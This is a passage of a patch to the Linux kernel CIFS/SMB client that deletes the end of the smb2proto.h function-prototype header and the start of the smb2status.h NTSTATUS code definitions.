+-		     const char *tree, struct cifs_tcon *tcon,
+-		     const struct nls_table *);
+-extern int SMB2_tdis(const unsigned int xid, struct cifs_tcon *tcon);
+-extern int SMB2_open(const unsigned int xid, struct cifs_open_parms *oparms,
+-		     __le16 *path, __u8 *oplock,
+-		     struct smb2_file_all_info *buf,
+-		     struct create_posix_rsp *posix,
+-		     struct kvec *err_iov, int *resp_buftype);
+-extern int SMB2_open_init(struct cifs_tcon *tcon,
+-			  struct TCP_Server_Info *server,
+-			  struct smb_rqst *rqst,
+-			  __u8 *oplock, struct cifs_open_parms *oparms,
+-			  __le16 *path);
+-extern void SMB2_open_free(struct smb_rqst *rqst);
+-extern int SMB2_ioctl(const unsigned int xid, struct cifs_tcon *tcon,
+-		     u64 persistent_fid, u64 volatile_fid, u32 opcode,
+-		     char *in_data, u32 indatalen, u32 maxoutlen,
+-		     char **out_data, u32 *plen /* returned data len */);
+-extern int SMB2_ioctl_init(struct cifs_tcon *tcon,
+-			   struct TCP_Server_Info *server,
+-			   struct smb_rqst *rqst,
+-			   u64 persistent_fid, u64 volatile_fid, u32 opcode,
+-			   char *in_data, u32 indatalen,
+-			   __u32 max_response_size);
+-extern void SMB2_ioctl_free(struct smb_rqst *rqst);
+-extern int SMB2_change_notify(const unsigned int xid, struct cifs_tcon *tcon,
+-			u64 persistent_fid, u64 volatile_fid, bool watch_tree,
+-			u32 completion_filter, u32 max_out_data_len,
+-			char **out_data, u32 *plen /* returned data len */);
+-
+-extern int __SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
+-			u64 persistent_fid, u64 volatile_fid,
+-			struct smb2_file_network_open_info *pbuf);
+-extern int SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
+-		      u64 persistent_file_id, u64 volatile_file_id);
+-extern int SMB2_close_init(struct cifs_tcon *tcon,
+-			   struct TCP_Server_Info *server,
+-			   struct smb_rqst *rqst,
+-			   u64 persistent_fid, u64 volatile_fid,
+-			   bool query_attrs);
+-extern void SMB2_close_free(struct smb_rqst *rqst);
+-extern int SMB2_flush(const unsigned int xid, struct cifs_tcon *tcon,
+-		      u64 persistent_file_id, u64 volatile_file_id);
+-extern int SMB2_flush_init(const unsigned int xid, struct smb_rqst *rqst,
+-			   struct cifs_tcon *tcon,
+-			   struct TCP_Server_Info *server,
+-			   u64 persistent_file_id, u64 volatile_file_id);
+-extern void SMB2_flush_free(struct smb_rqst *rqst);
+-extern int SMB311_posix_query_info(const unsigned int xid, struct cifs_tcon *tcon,
+-		u64 persistent_fid, u64 volatile_fid, struct smb311_posix_qinfo *data, u32 *plen);
+-extern int SMB2_query_info(const unsigned int xid, struct cifs_tcon *tcon,
+-			   u64 persistent_file_id, u64 volatile_file_id,
+-			   struct smb2_file_all_info *data);
+-extern int SMB2_query_info_init(struct cifs_tcon *tcon,
+-				struct TCP_Server_Info *server,
+-				struct smb_rqst *rqst,
+-				u64 persistent_fid, u64 volatile_fid,
+-				u8 info_class, u8 info_type,
+-				u32 additional_info, size_t output_len,
+-				size_t input_len, void *input);
+-extern void SMB2_query_info_free(struct smb_rqst *rqst);
+-extern int SMB2_query_acl(const unsigned int xid, struct cifs_tcon *tcon,
+-			  u64 persistent_file_id, u64 volatile_file_id,
+-			  void **data, unsigned int *plen, u32 info);
+-extern int SMB2_get_srv_num(const unsigned int xid, struct cifs_tcon *tcon,
+-			    u64 persistent_fid, u64 volatile_fid,
+-			    __le64 *uniqueid);
+-extern int smb2_async_readv(struct cifs_readdata *rdata);
+-extern int SMB2_read(const unsigned int xid, struct cifs_io_parms *io_parms,
+-		     unsigned int *nbytes, char **buf, int *buf_type);
+-extern int smb2_async_writev(struct cifs_writedata *wdata,
+-			     void (*release)(struct kref *kref));
+-extern int SMB2_write(const unsigned int xid, struct cifs_io_parms *io_parms,
+-		      unsigned int *nbytes, struct kvec *iov, int n_vec);
+-extern int SMB2_echo(struct TCP_Server_Info *server);
+-extern int SMB2_query_directory(const unsigned int xid, struct cifs_tcon *tcon,
+-				u64 persistent_fid, u64 volatile_fid, int index,
+-				struct cifs_search_info *srch_inf);
+-extern int SMB2_query_directory_init(unsigned int xid, struct cifs_tcon *tcon,
+-				     struct TCP_Server_Info *server,
+-				     struct smb_rqst *rqst,
+-				     u64 persistent_fid, u64 volatile_fid,
+-				     int index, int info_level);
+-extern void SMB2_query_directory_free(struct smb_rqst *rqst);
+-extern int SMB2_set_eof(const unsigned int xid, struct cifs_tcon *tcon,
+-			u64 persistent_fid, u64 volatile_fid, u32 pid,
+-			__le64 *eof);
+-extern int SMB2_set_info_init(struct cifs_tcon *tcon,
+-			      struct TCP_Server_Info *server,
+-			      struct smb_rqst *rqst,
+-			      u64 persistent_fid, u64 volatile_fid, u32 pid,
+-			      u8 info_class, u8 info_type, u32 additional_info,
+-			      void **data, unsigned int *size);
+-extern void SMB2_set_info_free(struct smb_rqst *rqst);
+-extern int SMB2_set_acl(const unsigned int xid, struct cifs_tcon *tcon,
+-			u64 persistent_fid, u64 volatile_fid,
+-			struct cifs_ntsd *pnntsd, int pacllen, int aclflag);
+-extern int SMB2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+-		       u64 persistent_fid, u64 volatile_fid,
+-		       struct smb2_file_full_ea_info *buf, int len);
+-extern int SMB2_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
+-				u64 persistent_fid, u64 volatile_fid);
+-extern int SMB2_oplock_break(const unsigned int xid, struct cifs_tcon *tcon,
+-			     const u64 persistent_fid, const u64 volatile_fid,
+-			     const __u8 oplock_level);
+-extern int smb2_handle_cancelled_close(struct cifs_tcon *tcon,
+-				       __u64 persistent_fid,
+-				       __u64 volatile_fid);
+-extern int smb2_handle_cancelled_mid(struct mid_q_entry *mid, struct TCP_Server_Info *server);
+-void smb2_cancelled_close_fid(struct work_struct *work);
+-extern int SMB2_QFS_info(const unsigned int xid, struct cifs_tcon *tcon,
+-			 u64 persistent_file_id, u64 volatile_file_id,
+-			 struct kstatfs *FSData);
+-extern int SMB311_posix_qfs_info(const unsigned int xid, struct cifs_tcon *tcon,
+-			 u64 persistent_file_id, u64 volatile_file_id,
+-			 struct kstatfs *FSData);
+-extern int SMB2_QFS_attr(const unsigned int xid, struct cifs_tcon *tcon,
+-			 u64 persistent_file_id, u64 volatile_file_id, int lvl);
+-extern int SMB2_lock(const unsigned int xid, struct cifs_tcon *tcon,
+-		     const __u64 persist_fid, const __u64 volatile_fid,
+-		     const __u32 pid, const __u64 length, const __u64 offset,
+-		     const __u32 lockFlags, const bool wait);
+-extern int smb2_lockv(const unsigned int xid, struct cifs_tcon *tcon,
+-		      const __u64 persist_fid, const __u64 volatile_fid,
+-		      const __u32 pid, const __u32 num_lock,
+-		      struct smb2_lock_element *buf);
+-extern int SMB2_lease_break(const unsigned int xid, struct cifs_tcon *tcon,
+-			    __u8 *lease_key, const __le32 lease_state);
+-extern int smb3_validate_negotiate(const unsigned int, struct cifs_tcon *);
+-
+-extern enum securityEnum smb2_select_sectype(struct TCP_Server_Info *,
+-					enum securityEnum);
+-extern void smb2_parse_contexts(struct TCP_Server_Info *server,
+-				struct smb2_create_rsp *rsp,
+-				unsigned int *epoch, char *lease_key,
+-				__u8 *oplock, struct smb2_file_all_info *buf,
+-				struct create_posix_rsp *posix);
+-extern int smb3_encryption_required(const struct cifs_tcon *tcon);
+-extern int smb2_validate_iov(unsigned int offset, unsigned int buffer_length,
+-			     struct kvec *iov, unsigned int min_buf_size);
+-extern int smb2_validate_and_copy_iov(unsigned int offset,
+-				      unsigned int buffer_length,
+-				      struct kvec *iov,
+-				      unsigned int minbufsize, char *data);
+-extern void smb2_copy_fs_info_to_kstatfs(
+-	 struct smb2_fs_full_size_info *pfs_inf,
+-	 struct kstatfs *kst);
+-extern int smb311_crypto_shash_allocate(struct TCP_Server_Info *server);
+-extern int smb311_update_preauth_hash(struct cifs_ses *ses,
+-				      struct TCP_Server_Info *server,
+-				      struct kvec *iov, int nvec);
+-extern int smb2_query_info_compound(const unsigned int xid,
+-				    struct cifs_tcon *tcon,
+-				    const char *path, u32 desired_access,
+-				    u32 class, u32 type, u32 output_len,
+-				    struct kvec *rsp, int *buftype,
+-				    struct cifs_sb_info *cifs_sb);
+-/* query path info from the server using SMB311 POSIX extensions*/
+-int smb311_posix_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+-				 struct cifs_sb_info *cifs_sb, const char *full_path,
+-				 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse);
+-int posix_info_parse(const void *beg, const void *end,
+-		     struct smb2_posix_info_parsed *out);
+-int posix_info_sid_size(const void *beg, const void *end);
+-#endif			/* _SMB2PROTO_H */
+diff --git a/fs/cifs/smb2status.h b/fs/cifs/smb2status.h
+deleted file mode 100644
+index a9e958166fc53..0000000000000
+--- a/fs/cifs/smb2status.h
++++ /dev/null
+@@ -1,1769 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   SMB2 Status code (network error) definitions
+- *   Definitions are from MS-ERREF
+- *
+- *   Copyright (c) International Business Machines  Corp., 2009,2011
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-/*
+- *  0 1 2 3 4 5 6 7 8 9 0 A B C D E F 0 1 2 3 4 5 6 7 8 9 A B C D E F
+- *  SEV C N <-------Facility--------> <------Error Status Code------>
+- *
+- *  C is set if "customer defined" error, N bit is reserved and MBZ
+- */
+-
+-#define STATUS_SEVERITY_SUCCESS __constant_cpu_to_le32(0x0000)
+-#define STATUS_SEVERITY_INFORMATIONAL cpu_to_le32(0x0001)
+-#define STATUS_SEVERITY_WARNING cpu_to_le32(0x0002)
+-#define STATUS_SEVERITY_ERROR cpu_to_le32(0x0003)
+-
+-struct ntstatus {
+-	/* Facility is the high 12 bits of the following field */
+-	__le32 Facility; /* low 2 bits Severity, next is Customer, then rsrvd */
+-	__le32 Code;
+-};
+-
+-#define STATUS_SUCCESS cpu_to_le32(0x00000000)
+-#define STATUS_WAIT_0 cpu_to_le32(0x00000000)
+-#define STATUS_WAIT_1 cpu_to_le32(0x00000001)
+-#define STATUS_WAIT_2 cpu_to_le32(0x00000002)
+-#define STATUS_WAIT_3 cpu_to_le32(0x00000003)
+-#define STATUS_WAIT_63 cpu_to_le32(0x0000003F)
+-#define STATUS_ABANDONED cpu_to_le32(0x00000080)
+-#define STATUS_ABANDONED_WAIT_0 cpu_to_le32(0x00000080)
+-#define STATUS_ABANDONED_WAIT_63 cpu_to_le32(0x000000BF)
+-#define STATUS_USER_APC cpu_to_le32(0x000000C0)
+-#define STATUS_KERNEL_APC cpu_to_le32(0x00000100)
+-#define STATUS_ALERTED cpu_to_le32(0x00000101)
+-#define STATUS_TIMEOUT cpu_to_le32(0x00000102)
+-#define STATUS_PENDING cpu_to_le32(0x00000103)
+-#define STATUS_REPARSE cpu_to_le32(0x00000104)
+-#define STATUS_MORE_ENTRIES cpu_to_le32(0x00000105)
+-#define STATUS_NOT_ALL_ASSIGNED cpu_to_le32(0x00000106)
+-#define STATUS_SOME_NOT_MAPPED cpu_to_le32(0x00000107)
+-#define STATUS_OPLOCK_BREAK_IN_PROGRESS cpu_to_le32(0x00000108)
+-#define STATUS_VOLUME_MOUNTED cpu_to_le32(0x00000109)
+-#define STATUS_RXACT_COMMITTED cpu_to_le32(0x0000010A)
+-#define STATUS_NOTIFY_CLEANUP cpu_to_le32(0x0000010B)
+-#define STATUS_NOTIFY_ENUM_DIR cpu_to_le32(0x0000010C)
+-#define STATUS_NO_QUOTAS_FOR_ACCOUNT cpu_to_le32(0x0000010D)
+-#define STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED cpu_to_le32(0x0000010E)
+-#define STATUS_PAGE_FAULT_TRANSITION cpu_to_le32(0x00000110)
+-#define STATUS_PAGE_FAULT_DEMAND_ZERO cpu_to_le32(0x00000111)
+-#define STATUS_PAGE_FAULT_COPY_ON_WRITE cpu_to_le32(0x00000112)
+-#define STATUS_PAGE_FAULT_GUARD_PAGE cpu_to_le32(0x00000113)
+-#define STATUS_PAGE_FAULT_PAGING_FILE cpu_to_le32(0x00000114)
+-#define STATUS_CACHE_PAGE_LOCKED cpu_to_le32(0x00000115)
+-#define STATUS_CRASH_DUMP cpu_to_le32(0x00000116)
+-#define STATUS_BUFFER_ALL_ZEROS cpu_to_le32(0x00000117)
+-#define STATUS_REPARSE_OBJECT cpu_to_le32(0x00000118)
+-#define STATUS_RESOURCE_REQUIREMENTS_CHANGED cpu_to_le32(0x00000119)
+-#define STATUS_TRANSLATION_COMPLETE cpu_to_le32(0x00000120)
+-#define STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY cpu_to_le32(0x00000121)
+-#define STATUS_NOTHING_TO_TERMINATE cpu_to_le32(0x00000122)
+-#define STATUS_PROCESS_NOT_IN_JOB cpu_to_le32(0x00000123)
+-#define STATUS_PROCESS_IN_JOB cpu_to_le32(0x00000124)
+-#define STATUS_VOLSNAP_HIBERNATE_READY cpu_to_le32(0x00000125)
+-#define STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY cpu_to_le32(0x00000126)
+-#define STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED cpu_to_le32(0x00000127)
+-#define STATUS_INTERRUPT_STILL_CONNECTED cpu_to_le32(0x00000128)
+-#define STATUS_PROCESS_CLONED cpu_to_le32(0x00000129)
+-#define STATUS_FILE_LOCKED_WITH_ONLY_READERS cpu_to_le32(0x0000012A)
+-#define STATUS_FILE_LOCKED_WITH_WRITERS cpu_to_le32(0x0000012B)
+-#define STATUS_RESOURCEMANAGER_READ_ONLY cpu_to_le32(0x00000202)
+-#define STATUS_WAIT_FOR_OPLOCK cpu_to_le32(0x00000367)
+-#define DBG_EXCEPTION_HANDLED cpu_to_le32(0x00010001)
+-#define DBG_CONTINUE cpu_to_le32(0x00010002)
+-#define STATUS_FLT_IO_COMPLETE cpu_to_le32(0x001C0001)
+-#define STATUS_OBJECT_NAME_EXISTS cpu_to_le32(0x40000000)
+-#define STATUS_THREAD_WAS_SUSPENDED cpu_to_le32(0x40000001)
+-#define STATUS_WORKING_SET_LIMIT_RANGE cpu_to_le32(0x40000002)
+-#define STATUS_IMAGE_NOT_AT_BASE cpu_to_le32(0x40000003)
+-#define STATUS_RXACT_STATE_CREATED cpu_to_le32(0x40000004)
+-#define STATUS_SEGMENT_NOTIFICATION cpu_to_le32(0x40000005)
+-#define STATUS_LOCAL_USER_SESSION_KEY cpu_to_le32(0x40000006)
+-#define STATUS_BAD_CURRENT_DIRECTORY cpu_to_le32(0x40000007)
+-#define STATUS_SERIAL_MORE_WRITES cpu_to_le32(0x40000008)
+-#define STATUS_REGISTRY_RECOVERED cpu_to_le32(0x40000009)
+-#define STATUS_FT_READ_RECOVERY_FROM_BACKUP cpu_to_le32(0x4000000A)
+-#define STATUS_FT_WRITE_RECOVERY cpu_to_le32(0x4000000B)
+-#define STATUS_SERIAL_COUNTER_TIMEOUT cpu_to_le32(0x4000000C)
+-#define STATUS_NULL_LM_PASSWORD cpu_to_le32(0x4000000D)
+-#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH cpu_to_le32(0x4000000E)
+-#define STATUS_RECEIVE_PARTIAL cpu_to_le32(0x4000000F)
+-#define STATUS_RECEIVE_EXPEDITED cpu_to_le32(0x40000010)
+-#define STATUS_RECEIVE_PARTIAL_EXPEDITED cpu_to_le32(0x40000011)
+-#define STATUS_EVENT_DONE cpu_to_le32(0x40000012)
+-#define STATUS_EVENT_PENDING cpu_to_le32(0x40000013)
+-#define STATUS_CHECKING_FILE_SYSTEM cpu_to_le32(0x40000014)
+-#define STATUS_FATAL_APP_EXIT cpu_to_le32(0x40000015)
+-#define STATUS_PREDEFINED_HANDLE cpu_to_le32(0x40000016)
+-#define STATUS_WAS_UNLOCKED cpu_to_le32(0x40000017)
+-#define STATUS_SERVICE_NOTIFICATION cpu_to_le32(0x40000018)
+-#define STATUS_WAS_LOCKED cpu_to_le32(0x40000019)
+-#define STATUS_LOG_HARD_ERROR cpu_to_le32(0x4000001A)
+-#define STATUS_ALREADY_WIN32 cpu_to_le32(0x4000001B)
+-#define STATUS_WX86_UNSIMULATE cpu_to_le32(0x4000001C)
+-#define STATUS_WX86_CONTINUE cpu_to_le32(0x4000001D)
+-#define STATUS_WX86_SINGLE_STEP cpu_to_le32(0x4000001E)
+-#define STATUS_WX86_BREAKPOINT cpu_to_le32(0x4000001F)
+-#define STATUS_WX86_EXCEPTION_CONTINUE cpu_to_le32(0x40000020)
+-#define STATUS_WX86_EXCEPTION_LASTCHANCE cpu_to_le32(0x40000021)
+-#define STATUS_WX86_EXCEPTION_CHAIN cpu_to_le32(0x40000022)
+-#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE cpu_to_le32(0x40000023)
+-#define STATUS_NO_YIELD_PERFORMED cpu_to_le32(0x40000024)
+-#define STATUS_TIMER_RESUME_IGNORED cpu_to_le32(0x40000025)
+-#define STATUS_ARBITRATION_UNHANDLED cpu_to_le32(0x40000026)
+-#define STATUS_CARDBUS_NOT_SUPPORTED cpu_to_le32(0x40000027)
+-#define STATUS_WX86_CREATEWX86TIB cpu_to_le32(0x40000028)
+-#define STATUS_MP_PROCESSOR_MISMATCH cpu_to_le32(0x40000029)
+-#define STATUS_HIBERNATED cpu_to_le32(0x4000002A)
+-#define STATUS_RESUME_HIBERNATION cpu_to_le32(0x4000002B)
+-#define STATUS_FIRMWARE_UPDATED cpu_to_le32(0x4000002C)
+-#define STATUS_DRIVERS_LEAKING_LOCKED_PAGES cpu_to_le32(0x4000002D)
+-#define STATUS_MESSAGE_RETRIEVED cpu_to_le32(0x4000002E)
+-#define STATUS_SYSTEM_POWERSTATE_TRANSITION cpu_to_le32(0x4000002F)
+-#define STATUS_ALPC_CHECK_COMPLETION_LIST cpu_to_le32(0x40000030)
+-#define STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION cpu_to_le32(0x40000031)
+-#define STATUS_ACCESS_AUDIT_BY_POLICY cpu_to_le32(0x40000032)
+-#define STATUS_ABANDON_HIBERFILE cpu_to_le32(0x40000033)
+-#define STATUS_BIZRULES_NOT_ENABLED cpu_to_le32(0x40000034)
+-#define STATUS_WAKE_SYSTEM cpu_to_le32(0x40000294)
+-#define STATUS_DS_SHUTTING_DOWN cpu_to_le32(0x40000370)
+-#define DBG_REPLY_LATER cpu_to_le32(0x40010001)
+-#define DBG_UNABLE_TO_PROVIDE_HANDLE cpu_to_le32(0x40010002)
+-#define DBG_TERMINATE_THREAD cpu_to_le32(0x40010003)
+-#define DBG_TERMINATE_PROCESS cpu_to_le32(0x40010004)
+-#define DBG_CONTROL_C cpu_to_le32(0x40010005)
+-#define DBG_PRINTEXCEPTION_C cpu_to_le32(0x40010006)
+-#define DBG_RIPEXCEPTION cpu_to_le32(0x40010007)
+-#define DBG_CONTROL_BREAK cpu_to_le32(0x40010008)
+-#define DBG_COMMAND_EXCEPTION cpu_to_le32(0x40010009)
+-#define RPC_NT_UUID_LOCAL_ONLY cpu_to_le32(0x40020056)
+-#define RPC_NT_SEND_INCOMPLETE cpu_to_le32(0x400200AF)
+-#define STATUS_CTX_CDM_CONNECT cpu_to_le32(0x400A0004)
+-#define STATUS_CTX_CDM_DISCONNECT cpu_to_le32(0x400A0005)
+-#define STATUS_SXS_RELEASE_ACTIVATION_CONTEXT cpu_to_le32(0x4015000D)
+-#define STATUS_RECOVERY_NOT_NEEDED cpu_to_le32(0x40190034)
+-#define STATUS_RM_ALREADY_STARTED cpu_to_le32(0x40190035)
+-#define STATUS_LOG_NO_RESTART cpu_to_le32(0x401A000C)
+-#define STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST cpu_to_le32(0x401B00EC)
+-#define STATUS_GRAPHICS_PARTIAL_DATA_POPULATED cpu_to_le32(0x401E000A)
+-#define STATUS_GRAPHICS_DRIVER_MISMATCH cpu_to_le32(0x401E0117)
+-#define STATUS_GRAPHICS_MODE_NOT_PINNED cpu_to_le32(0x401E0307)
+-#define STATUS_GRAPHICS_NO_PREFERRED_MODE cpu_to_le32(0x401E031E)
+-#define STATUS_GRAPHICS_DATASET_IS_EMPTY cpu_to_le32(0x401E034B)
+-#define STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET cpu_to_le32(0x401E034C)
+-#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED cpu_to_le32(0x401E0351)
+-#define STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS cpu_to_le32(0x401E042F)
+-#define STATUS_GRAPHICS_LEADLINK_START_DEFERRED cpu_to_le32(0x401E0437)
+-#define STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY cpu_to_le32(0x401E0439)
+-#define STATUS_GRAPHICS_START_DEFERRED cpu_to_le32(0x401E043A)
+-#define STATUS_NDIS_INDICATION_REQUIRED cpu_to_le32(0x40230001)
+-#define STATUS_GUARD_PAGE_VIOLATION cpu_to_le32(0x80000001)
+-#define STATUS_DATATYPE_MISALIGNMENT cpu_to_le32(0x80000002)
+-#define STATUS_BREAKPOINT cpu_to_le32(0x80000003)
+-#define STATUS_SINGLE_STEP cpu_to_le32(0x80000004)
+-#define STATUS_BUFFER_OVERFLOW cpu_to_le32(0x80000005)
+-#define STATUS_NO_MORE_FILES cpu_to_le32(0x80000006)
+-#define STATUS_WAKE_SYSTEM_DEBUGGER cpu_to_le32(0x80000007)
+-#define STATUS_HANDLES_CLOSED cpu_to_le32(0x8000000A)
+-#define STATUS_NO_INHERITANCE cpu_to_le32(0x8000000B)
+-#define STATUS_GUID_SUBSTITUTION_MADE cpu_to_le32(0x8000000C)
+-#define STATUS_PARTIAL_COPY cpu_to_le32(0x8000000D)
+-#define STATUS_DEVICE_PAPER_EMPTY cpu_to_le32(0x8000000E)
+-#define STATUS_DEVICE_POWERED_OFF cpu_to_le32(0x8000000F)
+-#define STATUS_DEVICE_OFF_LINE cpu_to_le32(0x80000010)
+-#define STATUS_DEVICE_BUSY cpu_to_le32(0x80000011)
+-#define STATUS_NO_MORE_EAS cpu_to_le32(0x80000012)
+-#define STATUS_INVALID_EA_NAME cpu_to_le32(0x80000013)
+-#define STATUS_EA_LIST_INCONSISTENT cpu_to_le32(0x80000014)
+-#define STATUS_INVALID_EA_FLAG cpu_to_le32(0x80000015)
+-#define STATUS_VERIFY_REQUIRED cpu_to_le32(0x80000016)
+-#define STATUS_EXTRANEOUS_INFORMATION cpu_to_le32(0x80000017)
+-#define STATUS_RXACT_COMMIT_NECESSARY cpu_to_le32(0x80000018)
+-#define STATUS_NO_MORE_ENTRIES cpu_to_le32(0x8000001A)
+-#define STATUS_FILEMARK_DETECTED cpu_to_le32(0x8000001B)
+-#define STATUS_MEDIA_CHANGED cpu_to_le32(0x8000001C)
+-#define STATUS_BUS_RESET cpu_to_le32(0x8000001D)
+-#define STATUS_END_OF_MEDIA cpu_to_le32(0x8000001E)
+-#define STATUS_BEGINNING_OF_MEDIA cpu_to_le32(0x8000001F)
+-#define STATUS_MEDIA_CHECK cpu_to_le32(0x80000020)
+-#define STATUS_SETMARK_DETECTED cpu_to_le32(0x80000021)
+-#define STATUS_NO_DATA_DETECTED cpu_to_le32(0x80000022)
+-#define STATUS_REDIRECTOR_HAS_OPEN_HANDLES cpu_to_le32(0x80000023)
+-#define STATUS_SERVER_HAS_OPEN_HANDLES cpu_to_le32(0x80000024)
+-#define STATUS_ALREADY_DISCONNECTED cpu_to_le32(0x80000025)
+-#define STATUS_LONGJUMP cpu_to_le32(0x80000026)
+-#define STATUS_CLEANER_CARTRIDGE_INSTALLED cpu_to_le32(0x80000027)
+-#define STATUS_PLUGPLAY_QUERY_VETOED cpu_to_le32(0x80000028)
+-#define STATUS_UNWIND_CONSOLIDATE cpu_to_le32(0x80000029)
+-#define STATUS_REGISTRY_HIVE_RECOVERED cpu_to_le32(0x8000002A)
+-#define STATUS_DLL_MIGHT_BE_INSECURE cpu_to_le32(0x8000002B)
+-#define STATUS_DLL_MIGHT_BE_INCOMPATIBLE cpu_to_le32(0x8000002C)
+-#define STATUS_STOPPED_ON_SYMLINK cpu_to_le32(0x8000002D)
+-#define STATUS_DEVICE_REQUIRES_CLEANING cpu_to_le32(0x80000288)
+-#define STATUS_DEVICE_DOOR_OPEN cpu_to_le32(0x80000289)
+-#define STATUS_DATA_LOST_REPAIR cpu_to_le32(0x80000803)
+-#define DBG_EXCEPTION_NOT_HANDLED cpu_to_le32(0x80010001)
+-#define STATUS_CLUSTER_NODE_ALREADY_UP cpu_to_le32(0x80130001)
+-#define STATUS_CLUSTER_NODE_ALREADY_DOWN cpu_to_le32(0x80130002)
+-#define STATUS_CLUSTER_NETWORK_ALREADY_ONLINE cpu_to_le32(0x80130003)
+-#define STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE cpu_to_le32(0x80130004)
+-#define STATUS_CLUSTER_NODE_ALREADY_MEMBER cpu_to_le32(0x80130005)
+-#define STATUS_COULD_NOT_RESIZE_LOG cpu_to_le32(0x80190009)
+-#define STATUS_NO_TXF_METADATA cpu_to_le32(0x80190029)
+-#define STATUS_CANT_RECOVER_WITH_HANDLE_OPEN cpu_to_le32(0x80190031)
+-#define STATUS_TXF_METADATA_ALREADY_PRESENT cpu_to_le32(0x80190041)
+-#define STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET cpu_to_le32(0x80190042)
+-#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED cpu_to_le32(0x801B00EB)
+-#define STATUS_FLT_BUFFER_TOO_SMALL cpu_to_le32(0x801C0001)
+-#define STATUS_FVE_PARTIAL_METADATA cpu_to_le32(0x80210001)
+-#define STATUS_UNSUCCESSFUL cpu_to_le32(0xC0000001)
+-#define STATUS_NOT_IMPLEMENTED cpu_to_le32(0xC0000002)
+-#define STATUS_INVALID_INFO_CLASS cpu_to_le32(0xC0000003)
+-#define STATUS_INFO_LENGTH_MISMATCH cpu_to_le32(0xC0000004)
+-#define STATUS_ACCESS_VIOLATION cpu_to_le32(0xC0000005)
+-#define STATUS_IN_PAGE_ERROR cpu_to_le32(0xC0000006)
+-#define STATUS_PAGEFILE_QUOTA cpu_to_le32(0xC0000007)
+-#define STATUS_INVALID_HANDLE cpu_to_le32(0xC0000008)
+-#define STATUS_BAD_INITIAL_STACK cpu_to_le32(0xC0000009)
+-#define STATUS_BAD_INITIAL_PC cpu_to_le32(0xC000000A)
+-#define STATUS_INVALID_CID cpu_to_le32(0xC000000B)
+-#define STATUS_TIMER_NOT_CANCELED cpu_to_le32(0xC000000C)
+-#define STATUS_INVALID_PARAMETER cpu_to_le32(0xC000000D)
+-#define STATUS_NO_SUCH_DEVICE cpu_to_le32(0xC000000E)
+-#define STATUS_NO_SUCH_FILE cpu_to_le32(0xC000000F)
+-#define STATUS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0000010)
+-#define STATUS_END_OF_FILE cpu_to_le32(0xC0000011)
+-#define STATUS_WRONG_VOLUME cpu_to_le32(0xC0000012)
+-#define STATUS_NO_MEDIA_IN_DEVICE cpu_to_le32(0xC0000013)
+-#define STATUS_UNRECOGNIZED_MEDIA cpu_to_le32(0xC0000014)
+-#define STATUS_NONEXISTENT_SECTOR cpu_to_le32(0xC0000015)
+-#define STATUS_MORE_PROCESSING_REQUIRED cpu_to_le32(0xC0000016)
+-#define STATUS_NO_MEMORY cpu_to_le32(0xC0000017)
+-#define STATUS_CONFLICTING_ADDRESSES cpu_to_le32(0xC0000018)
+-#define STATUS_NOT_MAPPED_VIEW cpu_to_le32(0xC0000019)
+-#define STATUS_UNABLE_TO_FREE_VM cpu_to_le32(0xC000001A)
+-#define STATUS_UNABLE_TO_DELETE_SECTION cpu_to_le32(0xC000001B)
+-#define STATUS_INVALID_SYSTEM_SERVICE cpu_to_le32(0xC000001C)
+-#define STATUS_ILLEGAL_INSTRUCTION cpu_to_le32(0xC000001D)
+-#define STATUS_INVALID_LOCK_SEQUENCE cpu_to_le32(0xC000001E)
+-#define STATUS_INVALID_VIEW_SIZE cpu_to_le32(0xC000001F)
+-#define STATUS_INVALID_FILE_FOR_SECTION cpu_to_le32(0xC0000020)
+-#define STATUS_ALREADY_COMMITTED cpu_to_le32(0xC0000021)
+-#define STATUS_ACCESS_DENIED cpu_to_le32(0xC0000022)
+-#define STATUS_BUFFER_TOO_SMALL cpu_to_le32(0xC0000023)
+-#define STATUS_OBJECT_TYPE_MISMATCH cpu_to_le32(0xC0000024)
+-#define STATUS_NONCONTINUABLE_EXCEPTION cpu_to_le32(0xC0000025)
+-#define STATUS_INVALID_DISPOSITION cpu_to_le32(0xC0000026)
+-#define STATUS_UNWIND cpu_to_le32(0xC0000027)
+-#define STATUS_BAD_STACK cpu_to_le32(0xC0000028)
+-#define STATUS_INVALID_UNWIND_TARGET cpu_to_le32(0xC0000029)
+-#define STATUS_NOT_LOCKED cpu_to_le32(0xC000002A)
+-#define STATUS_PARITY_ERROR cpu_to_le32(0xC000002B)
+-#define STATUS_UNABLE_TO_DECOMMIT_VM cpu_to_le32(0xC000002C)
+-#define STATUS_NOT_COMMITTED cpu_to_le32(0xC000002D)
+-#define STATUS_INVALID_PORT_ATTRIBUTES cpu_to_le32(0xC000002E)
+-#define STATUS_PORT_MESSAGE_TOO_LONG cpu_to_le32(0xC000002F)
+-#define STATUS_INVALID_PARAMETER_MIX cpu_to_le32(0xC0000030)
+-#define STATUS_INVALID_QUOTA_LOWER cpu_to_le32(0xC0000031)
+-#define STATUS_DISK_CORRUPT_ERROR cpu_to_le32(0xC0000032)
+-#define STATUS_OBJECT_NAME_INVALID cpu_to_le32(0xC0000033)
